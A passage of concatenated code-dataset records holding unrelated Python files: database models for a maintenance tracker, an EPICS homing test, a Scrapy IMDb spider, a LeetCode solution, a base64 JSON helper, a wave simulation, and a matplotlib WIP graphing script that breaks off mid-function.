@staticmethod\n def default():\n admin = Admin()\n admin.firstname = db.app.config['DEFAULT_ADMIN_FIRST_NAME']\n admin.lastname = db.app.config['DEFAULT_ADMIN_LAST_NAME']\n admin.email = db.app.config['DEFAULT_ADMIN_EMAIL']\n admin.username = db.app.config['DEFAULT_ADMIN_USER_NAME']\n admin.password = bcrypt.encrypt(db.app.config['DEFAULT_ADMIN_PASSWORD'])\n admin.profile_picture = db.app.config['DEFAULT_ADMIN_PROFILE_PICTURE']\n\n return admin\n\n\nclass Request(v1.models.Request, DBBaseModel):\n \"\"\"\n Contains the maintenance/repair request\n \"\"\"\n __table__ = \"requests\"\n\n @classmethod\n def migrate(cls):\n db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS requests(\n id serial PRIMARY KEY ,\n product_name varchar,\n description varchar,\n status varchar,\n photo varchar,\n created_by INTEGER,\n created_at TIMESTAMP,\n updated_at TIMESTAMP,\n FOREIGN KEY (created_by) REFERENCES users(id) ON DELETE CASCADE)\"\"\")\n db.connection.commit()\n\n @classmethod\n def deserialize(cls, dictionary):\n request = Request()\n request.id = dictionary['id']\n request.product_name = dictionary['product_name']\n request.description = dictionary['description']\n request.status = dictionary['status']\n request.photo = dictionary['photo']\n request.created_by = dictionary['created_by']\n request.created_at = dictionary['created_at']\n request.updated_at = dictionary['updated_at']\n\n return request\n\n def save(self):\n \"\"\"\n Save the request into the database\n :return:\n \"\"\"\n db.cursor.execute(\n \"INSERT INTO requests(product_name,description,status,photo,created_by,created_at,updated_at)\"\n \" VALUES(%s,%s,%s,%s,%s,%s,%s) RETURNING id\", (\n self.product_name,\n self.description,\n self.status,\n self.photo,\n self.created_by,\n self.created_at,\n self.updated_at\n ))\n super().save()\n\n def update(self):\n super().update()\n db.cursor.execute(\n \"UPDATE requests SET product_name = %s, description = %s, \"\n \"status = %s, photo = %s, updated_at = now() WHERE id = %s\", (\n self.product_name,\n self.description,\n self.status,\n self.photo,\n self.id\n )\n )\n db.connection.commit()\n\n def approve(self):\n \"\"\"\n Mark a request as approved\n :return:\n \"\"\"\n self.status = Request.STATUS_APPROVED\n self.update()\n\n def disapprove(self):\n \"\"\"\n Mark a request as disapproved\n :return:\n \"\"\"\n self.status = Request.STATUS_DISAPPROVED\n self.update()\n\n def resolve(self):\n \"\"\"\n Mark a request as resolved\n :return:\n \"\"\"\n self.status = Request.STATUS_RESOLVED\n self.update()\n\n def feedback(self):\n \"\"\"\n Gets the feedback associated with this request\n :return:\n \"\"\"\n return Feedback.query_by_field(\"request\", self.id)\n\n @classmethod\n def query_for_user(cls, user_id):\n \"\"\"\n Gets all the requests for this user\n :param user_id:\n :return:\n \"\"\"\n return Request.query_by_field(\"created_by\", user_id)\n\n\nclass Feedback(v1.models.Feedback, DBBaseModel):\n \"\"\"\n Stores the feedback to the requests\n \"\"\"\n __table__ = \"feedback\"\n\n @classmethod\n def migrate(cls):\n \"\"\"\n Creates the feedback table\n :return:\n \"\"\"\n db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS feedback(\n id serial PRIMARY KEY ,\n admin INTEGER,\n request INTEGER,\n message varchar,\n created_at timestamp,\n updated_at TIMESTAMP,\n foreign key (admin) references users(id) ON DELETE CASCADE,\n foreign key (request) references requests(id) ON DELETE CASCADE\n )\"\"\")\n db.connection.commit()\n\n @classmethod\n def deserialize(cls, dictionary):\n feedback = Feedback()\n feedback.id = dictionary['id']\n feedback.admin = dictionary['admin']\n feedback.request = dictionary['request']\n feedback.message = dictionary['message']\n feedback.created_at = dictionary['created_at']\n feedback.updated_at = dictionary['updated_at']\n\n return feedback\n\n def save(self):\n \"\"\"\n Saves a feedback to the feedback table\n :return:\n \"\"\"\n db.cursor.execute(\"INSERT INTO feedback(admin, request, message, created_at, updated_at) \"\n \"VALUES(%s,%s,%s,%s,%s) RETURNING id\", (\n self.admin,\n self.request,\n self.message,\n self.created_at,\n self.updated_at\n ))\n\n super().save()\n\n def update(self):\n super().update()\n db.cursor.execute(\n \"UPDATE feedback SET admin = %s, request = %s, message = %s, updated_at = now() WHERE id = %d\",\n (\n self.admin,\n self.request,\n self.message,\n self.id\n ))\n\n def maintenance_request(self):\n \"\"\"\n Returns the request for this Feedback\n :return:\n \"\"\"\n return Request.query_by_id(self.request)\n\n\nclass Notification(v1.models.Notification, DBBaseModel):\n \"\"\"\n Stores the unread and the read notifications for the user\n \"\"\"\n __table__ = \"notifications\"\n\n @classmethod\n def migrate(cls):\n \"\"\"\n Create the Notifications Table\n :return:\n \"\"\"\n db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS notifications(\n id serial PRIMARY KEY ,\n admin_id INTEGER,\n user_id INTEGER,\n message varchar,\n read boolean,\n created_at timestamp,\n updated_at timestamp,\n FOREIGN KEY (admin_id) references users(id),\n FOREIGN KEY (user_id) references users(id) ON DELETE CASCADE\n )\"\"\")\n db.connection.commit()\n\n @classmethod\n def deserialize(cls, dictionary):\n notification = Notification()\n notification.id = dictionary['id']\n notification.admin = dictionary['admin_id']\n notification.user = dictionary['user_id']\n notification.message = dictionary['message']\n notification.read = dictionary['read']\n notification.updated_at = dictionary['updated_at']\n notification.created_at = dictionary['created_at']\n\n return notification\n\n def save(self):\n \"\"\"\n Save the notification into the database\n :return:\n \"\"\"\n db.cursor.execute(\n \"INSERT INTO notifications(admin_id,user_id,message,read, created_at, updated_at) \"\n \"VALUES(%s,%s,%s,%s,%s,%s) RETURNING id;\",\n (\n self.admin,\n self.user,\n self.message,\n False,\n self.created_at,\n self.updated_at\n ))\n super().save()\n\n def update(self):\n \"\"\"\n Update the notification in the database\n :return:\n \"\"\"\n super().update()\n db.cursor.execute(\"UPDATE notifications SET message = %s, read = %s, updated_at = now()\", (\n self.message,\n self.read\n ))\n db.connection.commit()\n\n def mark_as_read(self):\n \"\"\"\n Mark a notification as read\n :return:\n \"\"\"\n self.read = True\n self.update()\n\n def get_admin(self):\n \"\"\"\n Get the Admin that created this notification\n :return:\n \"\"\"\n return User.query_by_id(self.admin)\n\n def get_user(self):\n \"\"\"\n Get the User that received this notification\n :return:\n \"\"\"\n return User.query_by_id(self.user)\n\n @classmethod\n def query_all_for_user(cls, user_id):\n \"\"\"\n Returns all the notifications sent to this a user\n :param user_id:\n :return:\n \"\"\"\n return Notification.query_by_field(\"user_id\", user_id)\n\n\nclass Blacklist(DBBaseModel):\n \"\"\"\n Contains the list of blacklisted tokens when a user logs out\n \"\"\"\n __table__ = \"blacklist\"\n\n def __init__(self, token):\n super().__init__(datetime.now(), datetime.now())\n self.token = token\n\n @classmethod\n def deserialize(cls, dictionary):\n blacklist = Blacklist()\n blacklist.id = dictionary['id']\n blacklist.token = dictionary['token']\n\n return blacklist\n\n @classmethod\n def migrate(cls):\n \"\"\"\n Create the table to store the blacklisted tokens\n :return:\n \"\"\"\n db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS blacklist(\n id serial PRIMARY KEY ,\n token varchar)\"\"\")\n db.connection.commit()\n\n def save(self):\n \"\"\"\n Saves a token into the database\n :return:\n \"\"\"\n\n db.cursor.execute(\"INSERT INTO blacklist(token) VALUES(%s)\", (self.token,))\n db.connection.commit()\n","repo_name":"gitaumoses4/maintenance-tracker","sub_path":"API/v2/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"3202518828","text":"#!/usr/bin/env python\n# Go to Fwd limit and then go back one mm and then again into the switch\n\nimport epics\nimport os\nimport sys\nimport time\nimport math\nimport unittest\nimport ecmcSlitDemoLib\n\ntestLoops = 10\ntimeout = 50\nif len(sys.argv)!=6:\n print(\"python ecmcTestHome.py. \")\n print(\"python ecmcTestHome.py IOC:Axis1 IOC:TestNumber 1 10\")\n sys.exit()\n\n\nmotorPvName = sys.argv[1]\ntestPvname = sys.argv[2]\nnCmdData = float(sys.argv[3]) \ntestNumber = float(sys.argv[4]) \ntestPv = epics.PV(testPvname)\n\nif testPv is None:\n print (\"Invalid testPv\") \n sys.exit()\n\n#Start homing sequences\necmcSlitDemoLib.setAxisEnable(motorPvName, 1)\ntime.sleep(1) \necmcSlitDemoLib.triggHomeAxis(motorPvName,nCmdData)\ntime.sleep(1) \necmcSlitDemoLib.setAxisEnable(motorPvName, 0)\ntestPv.put(testNumber)\n\nprint ('Homing done')\n\n# Runing homing\n","repo_name":"anderssandstrom/ecmccomgui","sub_path":"tools/ecmcTestHome.py","file_name":"ecmcTestHome.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25468499044","text":"import scrapy\nfrom moviescrawl.items import MoviescrawlItem\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass MoviesSpider(scrapy.Spider):\n name = \"imdbcrawl\"\n start_urls = [\n 'https://www.imdb.com/search/title/?groups=top_1000&sort=user_rating',\n ]\n\n def parse_movie(self,response):\n mydict = response.meta['data']\n mydict['release_date'] = response.xpath('//div[@class=\"subtext\"]/a[@title=\"See more release dates\"]/text()').extract_first()\n mydict['release_date'] = self.clean_data(mydict['release_date'])\n mydict['country']= response.xpath('//h4[text()=\"Country:\"]/following-sibling::a/text()').extract()\n mydict['language'] = response.xpath('//h4[text()=\"Language:\"]/following-sibling::a/text()').extract()\n mydict['year'] = response.xpath('.//span[@id=\"titleYear\"]/a/text()').extract_first()\n # mydict['synopsis'] = response.xpath('.//div[@class=\"summary_text\"]/text()').extract_first()\n mydict['synopsis'] = response.xpath('.//div[@class=\"summary_text\"]//text()').extract()\n mydict['storyline'] = response.xpath('.//div[@class=\"inline canwrap\"]/p/span/text()').extract_first()\n mydict['storyline'] = self.clean_data(mydict['storyline'])\n mydict['synopsis'] = self.parse_synopsis(mydict['synopsis'])\n # print(\"synopsis\",mydict['synopsis'])\n self.list_repr(mydict,['country','language','directors','actors'])\n movieItem = MoviescrawlItem(**mydict)\n # yield mydict\n # logger.debug(\"I am here\")\n yield movieItem\n\n def clean_data(self,str1):\n if str1 is not None:\n str1 = str1.replace(\"\\n\",\"\").strip()\n str1 = str1.replace('\"',\"\")\n return str1\n \n def parse_synopsis(self,list1):\n if list1 is not None:\n str1 = \"\".join(list1)\n str1 = str1.replace(\"\\n\",\"\").strip()\n str1 = str1.replace('\"',\"\")\n return str1\n return None\n\n def list_repr(self,mydict,keys):\n for key in keys:\n if mydict[key] is not None:\n mydict[key] = \", \".join(mydict[key])\n \n\n def clean_runtime(self,str1):\n if str1 is not None:\n int1 = int(str1.split(\" \")[0])\n return int1\n return 0\n def parse(self, response):\n movies = response.xpath('//div[@class=\"lister-item-content\"]')\n for movie in movies:\n mydict = {\n 'ranking': movie.xpath('.//span[@class=\"lister-item-index unbold text-primary\"]/text()').extract_first(),\n 'movie': movie.xpath('.//h3[@class=\"lister-item-header\"]/a/text()').extract_first(),\n 'rating': movie.xpath('.//div[@class=\"inline-block ratings-imdb-rating\"]/@data-value').extract_first(),\n 'metascore': movie.xpath('.//div[@class=\"inline-block ratings-metascore\"]/span/text()').extract_first(),\n 'certification': movie.xpath('.//p[@class=\"text-muted \"]/span[@class=\"certificate\"]/text()').extract_first(),\n 'runtime': movie.xpath('.//span[@class=\"runtime\"]/text()').extract_first(),\n 'genre': movie.xpath('.//span[@class=\"genre\"]/text()').extract_first(),\n 'directors': movie.xpath('p[3]/span/preceding-sibling::a/text()').extract(),\n 'actors': movie.xpath('p[3]/span/following-sibling::a/text()').extract(),\n 'votes': movie.xpath('.//p[@class=\"sort-num_votes-visible\"]/span[@name=\"nv\"][1]/@data-value').extract_first(),\n }\n mydict['ranking'] = mydict['ranking'].replace(\",\",\"\")\n mydict['genre'] = self.clean_data(mydict['genre'])\n mydict['runtime'] = self.clean_runtime(mydict['runtime'])\n movie_url = movie.xpath('.//h3[@class=\"lister-item-header\"]/a/@href').extract_first()\n movie_url = response.urljoin(movie_url)\n yield scrapy.Request(movie_url, self.parse_movie, meta = {'data': mydict})\n\n relative_url = movies.xpath('//a[@class=\"lister-page-next next-page\"]/@href').extract_first()\n relative_url = response.urljoin(relative_url)\n print(\"next_page\",relative_url) \n yield scrapy.Request(relative_url, callback=self.parse)\n","repo_name":"AbidHasan95/moviehunt","sub_path":"moviescrawl/spiders/movies_spider.py","file_name":"movies_spider.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72623503845","text":"from collections import Counter\n\n\nclass Solution:\n def maxScore(self, s: str) -> int:\n score = 0\n for i in range(1, len(s)):\n score = max(\n score, \n Counter(s[:i])[\"0\"] + Counter(s[i:])[\"1\"]\n )\n return score","repo_name":"josharnoldjosh/LeetCodeSolutions","sub_path":"maximum-score-after-splitting-a-string/maximum-score-after-splitting-a-string.py","file_name":"maximum-score-after-splitting-a-string.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2696699474","text":"import base64\n\nPAYLOAD = {\n \"num\": 12345,\n \"bool\": True,\n \"name\": \"myx\",\n \"age\": \"100\",\n \"list_str\": [\"ss\", \"ss\"],\n \"list_obj\": [\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n }\n ],\n \"obj\": {\n \"num\": 12345,\n \"bool\": True,\n \"name\": \"myx\",\n \"obj\": {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n \"list_obj\": [\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n }\n ],\n }\n}\n\n\ndef encrypt_json(json: dict, modifier) -> dict:\n result: dict = {}\n\n for k, v in list(json.items()):\n if type(v) is dict:\n result[k] = encrypt_json(v, modifier)\n elif type(v) is list:\n result[k] = [(modifier(i) if type(i) is not dict else encrypt_json(i, modifier)) for i in v]\n else:\n result[k] = modifier(v)\n return result\n\n\nif __name__ == '__main__':\n def modifier(s): return base64.b64encode(str(s).encode())\n\n # print(encrypt_json(PAYLOAD, lambda s: base64.b64encode(str(s).encode())))\n print(encrypt_json(PAYLOAD, modifier))\n","repo_name":"myx-oneoonine/python-playground","sub_path":"encrypt_json.py","file_name":"encrypt_json.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18705499931","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 22:07:35 2018\n\n@author: Matt\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n#%matplotlib qt\n\n#constants\nL=1\nd=0.1\nC=1\nsig=0.3\nh=10**-6\nn=200\nv=100\nnl=400\nnts = 30000\ntf = h*nts\n#define psi for initial conditions\ndef psi(x):\n a = C*x*(L-x)/L**2\n b = np.exp(-((x-d)**2)/(2*sig**2))\n return a*b\n#matricies for time progression\nps = np.zeros([n,nts])\nph = np.zeros([n,nts])\nl = np.linspace(0,L,n)#positions along the string\nfor i in range(0,n):\n ps[i,0] = psi(l[i])#initial velocities\nfor T in range(0,nts-1):#integration loop\n for i in range(0,n):\n ph[i][T+1] = ph[i][T]+h*ps[i][T]#update positions\n for i in range(1,n-1):#hold edgepoints constant for velocities\n ps[i][T+1] = ps[i][T]+h*(v**2/(l[1]**2))*(ph[i+1][T]+ph[i-1][T]-2*ph[i][T]) \n if T%1000 == 0:\n print(T/nts*100,\"%\")#counter to see progressiosn\n#lowlim = min(min(j) for j in ph)\n#uplim = max(max(j) for j in ph)\nlowlim = -0.001#define limits\nuplim = 0.001#define limits\n# =============================================================================\n# fig, ax = plt.figure(), plt.axes(xlim=(0,1),ylim=(lowlim,uplim))\n# x = l\n# line, = ax.plot(x,ph[:,i])\n# def init(): # only required for blitting to give a clean slate.\n# line.set_ydata([np.nan] * len(x))\n# return line,\n# \n# \n# def animate(i):\n# line.set_ydata(ph[:,i]) # update the data.\n# return line,\n# \n# \n# ani = animation.FuncAnimation(\n# fig, animate, init_func=init, interval=20, blit=False, frames = len(ph[3,:]))\n# #ani.save(\"movie.mp4\")\n# \n# plt.show()\n# =============================================================================\n# =============================================================================\n# xdata, ydata = [], []\n# fig, ax = plt.figure(), plt.axes(xlim=(0,1),ylim=(lowlim,uplim))\n# line, = ax.plot([], [], lw=2)\n# def init():\n# line.set_data([], [])\n# return line,\n# def animate(i):\n# x = l\n# y = ph[:,i]\n# line.set_data(x, y)\n# return line,\n# \n# anim = FuncAnimation(fig, animate, frames=np.linspace(0, tf, nts/100),\n# init_func=init, blit=True)\n# anim.save('basic_animation.mp4',writer='ffmpeg',fps=50,dpi=600)\n# =============================================================================\n#make sure backend graphics are set to automatic\nplt.ion()\n#initial plot set up\nfig = plt.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(l, ph[:,0], 'r-')#,xlim=[0,1],ylim=[lowlim,uplim]) \nax.set_xlim([0,1])\nax.set_ylim([lowlim,uplim])\n\nfor i in range(0,nts):\n if i%10==0:#skip some steps to make go faster.\n #ax.xlim([0,1])\n #updates plots at time progresses\n ax.set_ylim([lowlim,uplim])\n line1.set_ydata(ph[:,i])\n fig.canvas.draw()\n fig.canvas.flush_events()\nplt.show()\n\nplt.subplot(221)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,3000])\nplt.xlabel('position')\nplt.ylabel('displacment')\nplt.title('time = %f'%(h*3000))\n\nplt.subplot(222)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,15000])\nplt.xlabel('position')\nplt.ylabel('displacment')\nplt.title('time = %f'%(h*15000))\n\nplt.subplot(223)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,23800])\nplt.xlabel('position')\nplt.ylabel('displacment')\nplt.title('time = %f'%(h*23800))\n\nplt.subplot(224)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,28500])\nplt.xlabel('position')\nplt.ylabel('displacment')\nplt.title('time = %f'%(h*28500))\nplt.tight_layout()\nplt.savefig('destabilization.png')\n","repo_name":"matthew-rozak/MROZAK-PHY407","sub_path":"Lab 8/LAB8_Q2.py","file_name":"LAB8_Q2.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27754487774","text":"# produce graph from database\n\n\n# import libraries\nimport datetime\n\n# import os\nfrom pathlib import Path, WindowsPath\nimport sqlite3\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import MonthLocator, DateFormatter\nfrom colorama import init, Fore\n\n# initialise colorama\ninit()\n\n\n# main routine\ndef print_graphs(database_name, output_directory):\n database_name = Path(database_name)\n output_directory = Path(output_directory)\n plot_graphs(database_name, output_directory)\n\n\n# function to plot graphs - primary function\ndef plot_graphs(database_name, output_directory):\n\n months_to_plot = \"12\"\n\n # extract the most recent wip date from the database\n recent_wip_date = most_recent_wip(database_name)\n\n # extract the project_list based on the most recent wip date\n project_list = recent_project_list(recent_wip_date, database_name)\n\n # iterate through the project_list and plot graphs to each project\n sucessful = 0\n failed = 0\n for project in project_list:\n try:\n search_data = (project, months_to_plot)\n # plot the Forecast Data graph\n request = \"wipdate, projectNumber, projectname.name, \\\n forecastCostTotal, forecastSaleTotal, \\\n forecastMarginTotal, currentCost, totalCertified\"\n graph_data = import_data_sql(search_data, request, database_name)\n plot_forecast_graph(graph_data, output_directory)\n\n # plot the variation histogram\n request = \"wipdate, projectNumber, projectname.name, \\\n agreedVariationsNo, budgetVariationsNo, \\\n submittedVariationsNo, agreedVariationsValue, \\\n budgetVariationsValue, submittedVariationsValue\"\n graph_data = import_data_sql(search_data, request, database_name)\n plot_variation_graph(graph_data, output_directory)\n sucessful += 1\n\n except Exception as e:\n print(Fore.RED)\n print(\"-\" * 40)\n print(\"skipping\", search_data[0], \"data incorrect\")\n print(\"Exception error\", e)\n print(\"-\" * 40)\n print(Fore.RESET)\n failed += 1\n continue\n\n if failed > 0:\n print(Fore.YELLOW)\n else:\n print(Fore.WHITE)\n print(\"printed\", sucessful, \"project graphs\", Fore.RESET)\n if failed > 0:\n print(Fore.RED)\n print(failed, \"projects failed to print\\n\")\n print(\"-\" * 40, Fore.RESET)\n\n\n# function to extract date of most recent wip in database\ndef most_recent_wip(database):\n assert type(database) is WindowsPath\n\n # connect to the datebase\n try:\n conn = sqlite3.connect(database)\n except NameError:\n print(Fore.RED)\n print(\"Database file\", database, \"does not exist\")\n print(\"Failed in most_recent_wip\")\n print(Fore.RESET)\n else:\n cur = conn.cursor()\n # extract the most recent wipdate\n cur.execute(\n \"\"\"\n SELECT max(wipDate) as latestdate FROM wipdata\n \"\"\"\n )\n\n latest_date = cur.fetchone()\n # extract the latest_date string from the list returned\n latest_date = str(latest_date[0])\n\n try:\n assert latest_date != \"None\", (\n database + \" contains an incorrect date format of None\"\n )\n except AssertionError as e:\n print(Fore.RED)\n print(\"-\" * 80)\n print(\"FATAL...\\n\", e)\n print(\"-\" * 80)\n print(Fore.RESET)\n pass\n\n return latest_date\n\n\n# function to extract list of most recent wips\ndef recent_project_list(search_date, database):\n assert type(database) is WindowsPath\n projects = []\n\n # connect to the database\n try:\n conn = sqlite3.connect(database)\n except NameError:\n print(Fore.RED)\n print(\"-\" * 40)\n print(\"Database file\", database, \"does not exist\")\n print(\"Failed in recent_project_list\")\n print(\"-\" * 40)\n print(Fore.RESET)\n else:\n cur = conn.cursor()\n\n # extract the list of most recent wips using the search_date\n cur.execute(\n \"\"\"\n SELECT projectNumber AS wipsThisMonth\n FROM wipdata\n WHERE (JulianDay(:search_date) - JulianDay(wipDate)) < 35\n GROUP BY projectNumber\"\"\",\n {\"search_date\": search_date},\n )\n\n project_list = cur.fetchall()\n\n for i in range(len(project_list)):\n projects.append(project_list[i][0])\n\n return projects\n\n\n# function to read data from SQL database based on job number & months\ndef import_data_sql(search_data, request, database):\n assert type(database) is WindowsPath\n project_number = search_data[0]\n months = search_data[1]\n conn = sqlite3.connect(database)\n cur = conn.cursor()\n\n # extract seachdata\n # reverse sort order newest to oldest\n cur.execute(\n \"\"\"\n SELECT * FROM (\n SELECT \"\"\"\n + request\n + \"\"\"\n FROM wipdata\n JOIN projectName\n ON wipdata.projectName = projectname.id\n WHERE projectNumber = :projectNumber\n AND forecastCostTotal > 0\n ORDER BY wipdate DESC\n LIMIT :months)\n ORDER BY wipdate ASC\n \"\"\",\n {\"projectNumber\": project_number, \"months\": months},\n )\n return cur.fetchall()\n\n\n# function to produce and output forecast graph\ndef plot_forecast_graph(graph_data, output_directory):\n\n # Set the common variables\n # set the font to Trebuchet MS\n plt.rcParams[\"font.sans-serif\"] = \"Trebuchet MS\"\n plt.rcParams[\"font.family\"] = \"sans-serif\"\n # remove padding from plot\n plt.rcParams[\"axes.autolimit_mode\"] = \"round_numbers\"\n plt.rcParams[\"axes.xmargin\"] = 0\n plt.rcParams[\"axes.ymargin\"] = 0\n\n # These are the \"Tableau 20\" colors as RGB.\n tableau20 = [\n (31, 119, 180),\n (174, 199, 232),\n (255, 127, 14),\n (255, 187, 120),\n (44, 160, 44),\n (152, 223, 138),\n (214, 39, 40),\n (255, 152, 150),\n (148, 103, 189),\n (197, 176, 213),\n (140, 86, 75),\n (196, 156, 148),\n (227, 119, 194),\n (247, 182, 210),\n (127, 127, 127),\n (199, 199, 199),\n (188, 189, 34),\n (219, 219, 141),\n (23, 190, 207),\n (158, 218, 229),\n ]\n\n # Scale the RGB values to the [0, 1] range,\n # which is the format matplotlib accepts.\n for i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255.0, g / 255.0, b / 255.0)\n\n # You typically want your plot to be ~1.33x wider than tall.\n # This plot is a rare exception because of the number of lines\n # being plotted on it.\n # Common sizes: (10, 7.5) and (12, 9)\n plt.figure(figsize=(12, 9))\n fig = plt.figure()\n\n fig, (ax, ax3) = plt.subplots(nrows=2)\n ax2 = ax.twinx()\n\n # Create the forcast totals graph\n # create the lists\n dates = []\n project_number = []\n project_name = []\n forecast_cost = []\n forecast_sale = []\n forecast_contribution = []\n\n # loop through the list graph_data to extract the x and y axis\n # data is produced in the folllowing format\n # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n for data in graph_data:\n dates.append(data[0])\n project_number.append(data[1])\n project_name.append(data[2])\n forecast_cost.append(data[3] / 1000)\n forecast_sale.append(data[4] / 1000)\n forecast_contribution.append(data[5] / 1000)\n\n # format the dates in the correct format to show\n dates = [datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n # plot the data\n forecast_sale_line = ax.plot(\n dates, forecast_sale, lw=2.5, color=tableau20[5], label=\"Forecast Sale\"\n )\n\n forecast_cost_line = ax.plot(\n dates, forecast_cost, lw=2.5, color=tableau20[0], label=\"Forecast Cost\"\n )\n\n forecast_contribution_line = ax2.plot(\n dates, forecast_contribution, lw=2.5, color=tableau20[2], label=\"Contribution\"\n )\n\n # set the y axis label\n ylabel = \"\\xA3k\"\n ax.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n ax2.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\", color=tableau20[2])\n\n for tl in ax2.get_yticklabels():\n tl.set_color(tableau20[2])\n\n # set the title of the graph\n title = project_name[0] + \" (\" + project_number[0] + \")\\n\"\n ax.set_title(title, fontsize=16, ha=\"center\")\n plt.gcf().autofmt_xdate()\n\n # create the to-date graph\n # create the lists\n dates = []\n project_number = []\n project_name = []\n current_cost = []\n total_certified = []\n\n # loop through the list graph_data to extract the x and y axis\n # data is produced in the folllowing format\n # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n for data in graph_data:\n dates.append(data[0])\n project_number.append(data[1])\n project_name.append(data[2])\n current_cost.append(data[6] / 1000)\n total_certified.append(data[7] / 1000)\n\n # format the dates in the correct format to show\n dates = [datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n # format the x axis date format\n months = MonthLocator()\n month_format = DateFormatter(\"%b-%y\")\n ax3.fmt_xdata = DateFormatter(\"%b-%y\")\n ax3.xaxis.set_major_locator(months)\n ax3.xaxis.set_major_formatter(month_format)\n ax.xaxis.set_major_locator(months)\n ax.xaxis.set_major_formatter(month_format)\n\n # plot the data\n current_cost_line = ax3.plot(\n dates, current_cost, lw=2.5, color=tableau20[11], label=\"Cost\"\n )\n total_certified_line = ax3.plot(\n dates, total_certified, lw=2.5, color=tableau20[6], label=\"Certified\"\n )\n\n # set the y axis label\n ylabel = \"\\xA3k\"\n ax3.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n # add the legend\n # shrink the axis height by 10% at the bottom\n box = ax3.get_position()\n ax3.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])\n\n # combine ax1 and ax2 labels\n lines, labels = ax.get_legend_handles_labels()\n lines2, labels2 = ax2.get_legend_handles_labels()\n lines3, labels3 = ax3.get_legend_handles_labels()\n\n # place the legend below the axis\n ax3.legend(\n lines + lines2 + lines3,\n labels + labels2 + labels3,\n loc=\"upper center\",\n fontsize=9,\n bbox_to_anchor=(0.5, -0.5),\n fancybox=True,\n shadow=True,\n ncol=5,\n )\n\n # plot the graph and save\n # plt.show()\n save_path = Path(output_directory, project_number[0] + \" forecast totals graph.png\")\n plt.savefig(Path(save_path), bbox_inches=\"tight\")\n plt.close(\"all\")\n\n\n# function to produce and output variation graph\ndef plot_variation_graph(graph_data, output_directory):\n\n # Set the common variables\n # set the font to Trebuchet MS\n plt.rcParams[\"font.sans-serif\"] = \"Trebuchet MS\"\n plt.rcParams[\"font.family\"] = \"sans-serif\"\n # outline bar elements with a black border\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.rcParams[\"patch.facecolor\"] = \"b\"\n\n # These are the \"Tableau 20\" colors as RGB.\n tableau20 = [\n (31, 119, 180),\n (174, 199, 232),\n (255, 127, 14),\n (255, 187, 120),\n (44, 160, 44),\n (152, 223, 138),\n (214, 39, 40),\n (255, 152, 150),\n (148, 103, 189),\n (197, 176, 213),\n (140, 86, 75),\n (196, 156, 148),\n (227, 119, 194),\n (247, 182, 210),\n (127, 127, 127),\n (199, 199, 199),\n (188, 189, 34),\n (219, 219, 141),\n (23, 190, 207),\n (158, 218, 229),\n ]\n\n # Scale the RGB values to the [0, 1] range,\n # which is the format matplotlib accepts.\n for i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255.0, g / 255.0, b / 255.0)\n\n # You typically want your plot to be ~1.33x wider than tall.\n # This plot is a rare exception because of the number of lines\n # being plotted on it.\n # Common sizes: (10, 7.5) and (12, 9)\n plt.figure(figsize=(12, 9))\n fig, (ax, ax2) = plt.subplots(nrows=2)\n\n # Create the forcast totals graph\n # create the lists\n dates = []\n project_number = []\n project_name = []\n agreed_variation_no = []\n budget_variation_no = []\n submitted_variation_no = []\n agreed_variation_value = []\n budget_variation_value = []\n submitted_variation_value = []\n\n # loop through the list graph_data to extract the x and y axis\n # data is produced in the folllowing format\n # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n for data in graph_data:\n dates.append(data[0])\n project_number.append(data[1])\n project_name.append(data[2])\n agreed_variation_no.append(data[3])\n budget_variation_no.append(data[4])\n submitted_variation_no.append(data[5])\n agreed_variation_value.append(data[6] / 1000)\n budget_variation_value.append(data[7] / 1000)\n submitted_variation_value.append(data[8] / 1000)\n\n # create the bins for the bar chart and set width of bar\n bins = list(range(len(dates)))\n width_of_date = 0.9\n\n # format the dates in the correct format to show\n dates = 